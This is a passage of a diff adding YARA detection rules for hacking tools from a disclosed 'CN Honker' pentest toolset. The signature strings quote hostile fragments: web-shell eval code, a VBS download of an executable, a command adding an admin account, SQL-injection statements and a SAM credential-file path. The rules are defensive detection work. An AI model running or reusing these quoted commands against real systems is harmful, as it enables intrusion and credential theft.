+      uint16 ( 0 ) == 0x5a4d and filesize < 381KB and all of them
+}
+
+rule CN_Honker_Fckeditor_RID2E62 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:12:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide
+      $s7 = "Fckeditor.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1340KB and all of them
+}
+
+rule CN_Honker_Codeeer_Explorer_RID312E : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:11:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Codeeer Explorer.exe" fullword wide
+      $s12 = "webBrowser1_ProgressChanged" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 470KB and all of them
+}
+
+rule CN_Honker_HASH_PwDump7_RID2EDE : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:32:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii
+      $s2 = "No Users key!" fullword ascii
+      $s3 = "NO PASSWORD*********************:" fullword ascii
+      $s4 = "Unable to dump file %S" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 380KB and all of them
+}
+
+rule CN_Honker_ChinaChopper_RID2F7B : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:59:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide
+      $s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide
+      $s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+}
+
+rule CN_Honker_dedecms5_7_RID2E67 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:13:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/data/admin/ver.txt" fullword ascii
+      $s2 = "SkinH_EL.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 830KB and all of them
+}
+
+rule CN_Honker_Alien_ee_RID2DD9 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ee.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:49:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GetIIS UserName and PassWord." fullword wide
+      $s2 = "Read IIS ID For FreeHost." fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of them
+}
+
+rule CN_Honker_smsniff_smsniff_RID3112 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file smsniff.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:06:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "smsniff.exe" fullword wide
+      $s5 = "SmartSniff" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 267KB and all of them
+}
+
+rule CN_Honker_Happy_Happy_RID2F2A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:45:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide
+      $s2 = "domainscan.exe" fullword wide
+      $s3 = "http://www.happysec.com/" fullword wide
+      $s4 = "cmdshell" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 655KB and 2 of them
+}
+
+rule CN_Honker_T00ls_Lpk_Sethc_v3_0_RID31CD : CHINA DEMO EXE FILE HKTL T1015 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:38:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1015"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://127.0.0.1/1.exe" fullword wide
+      $s2 = ":Rices  Forum:T00Ls.Net  [4 Fucker Te@m]" fullword wide
+      $s3 = "SkinH_EL.dll" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+}
+
+rule CN_Honker_NetFuke_NetFuke_RID308A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:44:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
+      $s2 = "netfuke_%s.txt" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1840KB and all of them
+}
+
+rule CN_Honker_ManualInjection_RID30C8 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:54:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii
+      $s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+}
+
+rule CN_Honker_CnCerT_CCdoor_CMD_RID30B2 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:50:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
+      $s3 = "cmdpath" fullword ascii
+      $s4 = "Get4Bytes" fullword ascii
+      $s5 = "ExcuteCmd" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 22KB and all of them
+}
+
+rule CN_Honker_termsrvhack_RID2F71 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:57:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "The terminal server cannot issue a client license.  It was unable to issue the" wide
+      $s6 = "%s\\%s\\%d\\%d" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1052KB and all of them
+}
+
+rule CN_Honker_IIS6_iis6_RID2DBC : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file iis6.com"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:44:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "GetMod;ul" fullword ascii
+      $s1 = "excjpb" fullword ascii
+      $s2 = "LEAUT1" fullword ascii
+      $s3 = "EnumProcessModules" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of them
+}
+
+rule CN_Honker_struts2_catbox_RID308E : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file catbox.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:44:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii
+      $s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 8160KB and all of them
+}
+
+rule CN_Honker_getlsasrvaddr_RID303D : CHINA DEMO EXE FILE HKTL T1003 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:31:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "pingme.txt" fullword ascii
+      $s16 = ".\\lsasrv.pdb" ascii
+      $s20 = "Addresses Found: " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule CN_Honker_ms10048_x64_RID2DE5 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:51:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[ ] Creating evil window" fullword ascii
+      $s2 = "[+] Set to %d exploit half succeeded" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 125KB and all of them
+}
+
+rule CN_Honker_LogCleaner_RID2EA3 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:23:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = ".exe <ip> [(path]" fullword ascii
+      $s4 = "LogCleaner v" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and all of them
+}
+
+rule CN_Honker_shell_brute_tool_RID317D : CHINA DEMO EXE FILE HKTL SCRIPT {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:24:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://24hack.com/xyadmin.asp" fullword ascii
+      $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule CN_Honker_hxdef100_RID2D67 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:30:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "BACKDOORSHELL" fullword ascii
+      $s15 = "%tmpdir%" fullword ascii
+      $s16 = "%cmddir%" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule CN_Honker_GetWebShell_RID2EFD : CHINA DEMO EXE FILE HKTL T1077 T1087 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:38:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1077, T1087"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii
+      $s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide
+      $s14 = "net user admin$ hack /add" fullword wide
+      $s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 70KB and 1 of them
+}
+
+rule CN_Honker_MSTSC_can_direct_copy_RID32D6 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:22:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
+      $s2 = "Clear Password" fullword wide
+      $s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and all of them
+}
+
+rule CN_Honker_lcx_lcx_RID2DB4 : CHINA DEMO EXE FILE HKTL T1020 T1090 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:43:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1020, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+      $s2 = "=========== Code by lion & bkbll" ascii
+      $s3 = "Welcome to [url]http://www.cnhonker.com[/url] " ascii
+      $s4 = "-tran   <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+      $s5 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
+}
+
+rule CN_Honker_PostgreSQL_RID2E9B : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file PostgreSQL.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:21:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "&http://192.168.16.186/details.php?id=1" fullword ascii
+      $s2 = "PostgreSQL_inject" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule CN_Honker_FTP_scanning_RID2F61 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:54:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "CNotSupportedE" fullword ascii
+      $s2 = "nINet.dll" fullword ascii
+      $s9 = "?=MODULE" fullword ascii
+      $s13 = "MSIE 6*" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 550KB and all of them
+}
+
+rule CN_Honker_dirdown_dirdown_RID3114 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file dirdown.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:07:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" ascii
+      $s1 = "Decompress.exe" fullword wide
+      $s5 = "Get8Bytes" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 45KB and all of them
+}
+
+rule CN_Honker_Xiaokui_conversion_tool_RID3463 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Xiaokui_conversion_tool.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:28:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "update [dv_user] set usergroupid=1 where userid=2;--" fullword ascii
+      $s2 = "To.exe" fullword wide
+      $s3 = "by zj1244" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+}
+
+rule CN_Honker_GroupPolicyRemover_RID3224 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:52:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "GP_killer.EXE" fullword wide
+      $s1 = "GP_killer Microsoft " fullword wide
+      $s2 = "SHDeleteKeyA" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and all of them
+}
+
+rule CN_Honker_WordpressScanner_RID315A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file WordpressScanner.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:18:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+      $s1 = "(http://www.eyuyan.com)" fullword wide
+      $s2 = "GetConnectString" fullword ascii
+      $s4 = "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule CN_Honker_Htran_V2_40_htran20_RID314C : CHINA DEMO EXE FILE HKTL T1020 T1090 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:16:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1020, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s -slave  ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii
+      $s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
+      $s3 = "[SERVER]connection to %s:%d error" fullword ascii
+      $s4 = "%s -connect ConnectHost [ConnectPort]       Default:%d" fullword ascii
+      $s5 = "[+] got, ip:%s, port:%d" fullword ascii
+      $s6 = "[-] There is a error...Create a new connection." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule CN_Honker_DictionaryGenerator_RID3284 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:08:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "`PasswordBuilder" fullword ascii
+      $s2 = "cracker" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3650KB and all of them
+}
+
+rule CN_Honker_ms11080_withcmd_RID2FF0 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ms11080_withcmd.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:18:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
+      $s3 = "[>] create pipe error" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 340KB and all of them
+}
+
+rule CN_Honker_T00ls_Lpk_Sethc_v2_RID313D : CHINA DEMO EXE FILE HKTL T1015 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v2.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:14:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1015"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "LOADER ERROR" fullword ascii
+      $s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+      $s3 = "2011-2012 T00LS&RICES" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and all of them
+}
+
+rule CN_Honker_HASH_32_RID2CAF : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file 32.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 09:59:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "[Undefined OS version]  Major: %d Minor: %d" fullword ascii
+      $s8 = "Try To Run As Administrator ..." fullword ascii
+      $s9 = "Specific LUID NOT found" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 240KB and all of them
+}
+
+rule CN_Honker_windows_mstsc_enhanced_RMDSTC_RID361C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file RMDSTC.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 16:41:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "zava zir5@163.com" fullword wide
+      $s1 = "By newccc" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+
+rule CN_Honker_sig_3389_mstsc_MSTSCAX_RID324B : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file MSTSCAX.DLL"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:59:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ResetPasswordWWWx" fullword ascii
+      $s2 = "Terminal Server Redirected Printer Doc" fullword wide
+      $s3 = "Cleaning temp directory" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule CN_Honker_T00ls_scanner_RID2FA3 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file T00ls_scanner.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:05:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://cn.bing.com/search?first=1&count=50&q=ip:" fullword wide
+      $s17 = "Team:www.t00ls.net" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 330KB and all of them
+}
+
+rule CN_Honker_GetHashes_RID2E43 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:07:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
